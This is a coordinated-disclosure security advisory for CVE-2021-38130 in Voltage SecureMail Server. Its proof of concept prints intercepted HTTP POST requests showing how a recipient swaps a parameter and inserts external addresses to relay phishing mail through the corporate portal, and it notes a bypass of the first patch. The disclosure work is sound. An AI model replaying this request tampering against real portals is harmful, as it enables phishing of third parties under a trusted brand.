Security Advisory
=======================================================================
title: Business Logic Bypass - Mail Relay
(Post-authenticated)
product: Voltage SecureMail Server
vulnerable version: Voltage SecureMail Server <v7.3.0.1
fixed version: Voltage SecureMail Server v7.3.0.1
CVE number: CVE-2021-38130
impact: Medium
homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail
found: 2021-06-25
by: TING Meng Yean (GIS Red Team)
United Overseas Bank Limited (UOB)
=======================================================================
Vendor description:
-------------------
Voltage SecureMail simplifies compliance to privacy regulations,
including MA, PCI, HITECH, UK FSA, and EU Data privacy directives,
and mitigates the risk of email security breaches. Voltage SecureMail
provides end-to-end security for email and attachments, inside the
enterprise to the desktop, at the enterprise gateway, and across
leading mobile smartphones and tablets. The solution provides the
confidence and peace of mind that sensitive data is protected in
transit and in storage, wherever it is in an email system to any
inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without
disrupting existing email services or business processes.
Source: http://www.securemailworks.com/SecureMail.asp
Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
upgrade to the latest version available.
Reference: https://portal.microfocus.com/s/article/KM000003667
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.
Vulnerability overview/description:
-----------------------------------
Business Logic Bypass - Mail Relay (Post-authenticated)
- CVE CVE-2021-38130
- CWE-284: Improper Access Control
- CVSSv3: 5.4 (Medium)
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Voltage SecureMail is an email protection service that provides email
encryption. With each secure email, there is an HTML attachment named
"message_zdm.html" that furnishes access to the Zero Download Messenger
(ZDM), which can be a web portal or mobile app. The encrypted body of
the original message as well as any attachments to the original email
is contained within this attachment.
The email recipient needs to install Voltage SecureMail app (for mobile) or
browse to the Voltage SecureMail Server portal (desktop) to authenticate and
view any secure email and attachments sent via ZDM.
When the recipient opens the "message_zdm.html" file for the first time
on a desktop, the browser is brought to the corporation's SecureMail
portal where the user has to create a password in order to continue.
An email verification email is sent to the recipient with a One Time Link,
and the recipient can read the email on the SecureMail portal after clicking
on the link.
If the recipient opens the "message_zdm.html" file again in the future,
the recipient has to input the previously created password.
When viewing the email on the SecureMail portal, the recipient can
choose to reply to the email by clicking "Reply" or "Reply to All".
The SecureMail portal only allows the recipient to reply to the
original email sender and to the email addresses in the Cc/Bcc list.
However, it is possible to modify the original email addresses in the
"to", "cc" or "bcc" fields, or to add arbitrary email addresses, by
sending a special POST request.
As the SecureMail portal displays the logo and valid SSL certificate of
the corporation in use, an attacker who have received a SecureMail encrypted
email previously can make use of the SecureMail portal to send phishing
emails to third parties. Note that the attacker is unable to spoof
the "from" address, so the emails to third parties will be from the
attacker's email address.
Proof of concept:
-----------------
When the recipient replies to the email by clicking "Reply" or "Reply to All", the
recipient is brought to the "Compose New Message" page. To send the email reply,
the recipient then clicks on the "Send Secure" button.
The SecureMail portal does not allow the modification of the "to", "cc" or
"bcc" field if the user attempts to intercept the POST request after
clicking on the "Send Secure" button.
However, if the user attempts to intercept the POST request after
clicking on the "Plain Text" button, the modification of the "to", "cc" or
"bcc" field is successful.
The modified email is then successfully sent out after the user
click on the "Send Secure" button.
It is noted that there is one difference in the POST request parameters
between a "Send Secure" and "Plain Text" that allows the "to", "cc" and
"bcc" fields to be modified, and the difference is the "send" versus "x"
parameters. The rest pf the contents of the "Send Secure" and "Plain Text"
POST requests are almost identical.
Original "Send Secure" Request
########################################################################
POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1
Host: <...snipped...>
Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...>
Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372
Te: trailers
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="CSRFToken"
<...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="c"
c3
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="h"
h924481124
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="send"
send
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="senderKeyEnc"
<...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="to"
original.sender@corp.com
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="showCcEnabled"
on
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="cc"
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="bcc"
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="subject"
RE: <...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="editModeToggle"
0
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="body"
<...snipped...>
-----------------------------289584800395870328816642372
########################################################################
Modified "Plain Text" request
########################################################################
POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1
Host: <...snipped...>
Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...>
Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372
Te: trailers
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="CSRFToken"
<...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="c"
c3
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="h"
h924481124
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="x"
x
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="senderKeyEnc"
<...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="to"
victim1@external.com
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="showCcEnabled"
on
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="cc"
victim2@external.com
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="bcc"
victim3@external.com
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="subject"
RE: <...snipped...>
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="editModeToggle"
1
-----------------------------289584800395870328816642372
Content-Disposition: form-data; name="body"
<...snipped...>
-----------------------------289584800395870328816642372--
########################################################################
As of the patched Voltage SecureMail Server version 7.3.0-259490, the
vulnerability for the "Plain Text" was no longer replicable. However, the same
vulnerability can be replicated using the "Attach" function.
Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
* 7.3
* 7.3.0-259490
Vendor contact timeline (GMT+8):
--------------------------------
2021-06-25: Contacting vendor through their SecureMail product support team.
2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT)
security@microfocus.com to request for CVE number.
2021-06-29: Micro Focus PSRT opened PSRT case 80358.
2021-07-02: SecureMail product support team confirmed the vulnerability and
working on patch.
2021-07-31: SecureMail product support team released test patch v7.3.0-259490.
2021-08-04: Confirmed vulnerability "Plain Text" function was no longer
replicable, but the same vulnerability can be replicated using the
"Attach" function. Notified the SecureMail product support team.
2021-11-11: SecureMail product support team released patch v7.3.0.1.
2022-01-21: Requested Micro Focus PSRT for updates.
2022-01-24: Micro Focus PSRT responded with assigned CVE number.
2022-01-29: Micro Focus PSRT published security bulletin.
2022-02-03: Coordinated release of security advisory.
Solution:
---------
According to the vendor, Voltage SecureMail resolved this vulnerability
in the version 7.3.0.1 patch release and customers should contact their support
representative for information about downloading and applying the patch.
Security Bulletin URL:
----------------------
https://portal.microfocus.com/s/article/KM000003667
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Meng Yean TING (GIS Red Team)
United Overseas Bank Limited (UOB)
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
JMIzsDM4+GTLxyZrv4jCloLk9g==
=nECi
-----END PGP PUBLIC KEY BLOCK-----
UOB EMAIL DISCLAIMER
Any person receiving this email and any attachment(s) contained,
shall treat the information as confidential and not misuse, copy,
disclose, distribute or retain the information in any way that
amounts to a breach of confidentiality. If you are not the intended
recipient, please delete all copies of this email from your computer
system. As the integrity of this message cannot be guaranteed,
neither UOB nor any entity in the UOB Group shall be responsible for
the contents. Any opinion in this email may not necessarily represent
the opinion of UOB or any entity in the UOB Group.